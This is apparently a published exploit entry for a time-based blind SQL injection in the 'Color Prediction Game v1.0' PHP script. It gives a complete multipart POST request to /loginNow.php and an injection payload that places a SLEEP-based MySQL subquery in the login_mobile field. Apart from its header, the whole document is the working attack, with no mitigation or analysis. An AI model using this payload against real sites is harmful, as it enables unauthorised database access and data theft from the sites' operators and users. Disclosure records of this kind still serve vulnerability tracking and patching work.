# Exploit Title: Color Prediction Game v1.0 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###

POST /loginNow.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
Gecko/20100101 Firefox/116.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------395879129218961020344050490865
Content-Length: 434
Origin: http://localhost
Referer: http://localhost/login.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"
4334343433
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"
123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"
login
-----------------------------395879129218961020344050490865--

### Parameter & Payloads ###
Parameter: MULTIPART login_mobile ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"
4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"
123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"
login
-----------------------------395879129218961020344050490865--